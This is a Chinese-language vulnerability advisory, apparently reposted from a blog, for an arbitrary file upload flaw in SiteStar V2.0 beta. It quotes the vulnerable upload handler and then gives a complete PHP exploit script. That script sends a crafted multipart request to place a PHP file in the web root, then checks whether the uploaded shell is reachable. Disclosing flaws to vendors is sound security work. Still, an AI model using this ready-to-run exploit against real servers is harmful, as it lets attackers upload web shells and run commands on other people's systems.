发布日期:2011-03.16

发布作者:cnryan

影响版本:SiteStar V2.0 beta

官方网站:http://www.sitestar.cn/

漏洞类型:文件上传

[1]漏洞概述:

SiteStar V2.0没有正确限制文件的上传,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令。

[2]漏洞分析:

漏洞产生在 /script/multiupload/uploadify.php 文件:

<?php
if (!empty($_FILES)) {
 $tempFile = $_FILES['Filedata']['tmp_name'];
 $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/';
 $targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
   // 解决Windows中文文件名乱码
 if (preg_match("/^WIN/i", PHP_OS)) {
  $targetFile = iconv('UTF-8', 'GBK', $targetFile);
 }
 move_uploaded_file($tempFile, $targetFile);
 echo "1";
}
?>

没什么好说的,低级失误。通过构造html表单可直接上传webshell至web目录,下面提供一段测试代码。

<?
print_r('
+---------------------------------------------------------------------------+
SiteStar V2.0 Remote Shell Upload Exploit
by cnryan
Mail: cnryan2008[at]gmail[dot]com
Blog: http://hi.baidu.com/cnryan
+---------------------------------------------------------------------------+
');
if ($argc < 3)
{
    print "\nUsage: php $argv[0] host path\n";
    print "Example: php $argv[0] localhost /sitestar/\n";
    die();
}
error_reporting(0);
set_time_limit(0);
$host = $argv[1];
$path = $argv[2];
$shell = 'http://'.$host.$path.'cnryan.php';
    $payload  = "-----cnryan\r\n";
    $payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"cnryan.php\"\r\n";
    $payload .= "Content-Type: application/octet-stream\r\n\r\n";
    $payload .= "<?php phpinfo();?>W.S.T\r\n-----cnryan\r\n";
    $payload .= "Content-Disposition: form-data; name=\"upload\"\r\n\r\n\r\n";
    $payload .= "-----cnryan\r\n";
    $payload .= "Content-Disposition: form-data; name=\"folder\"\r\n\r\n";
    $payload .= "$path\r\n";
    $payload .= "-----cnryan--";
    $packet  = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: keep-alive\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---cnryan\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";
    $packet .= $payload;
$fp = fsockopen($host, 80);
    fputs($fp, $packet);

   sleep(5);
   $str=file_get_contents($shell);
if(strpos($str,'W.S.T'))
    exit("OK! Got shell:\t$shell\n");
else
    exit("Exploit Failed!\n");
?> 

[4]漏洞状态:

漏洞已通知厂商。

[5]厂商回复:

感谢您的反馈,谢谢!


老洞,纯属收集,转自:http://hi.baidu.com/cnryan/blog/item/0d0a4377d9f6790fb151b9e6.html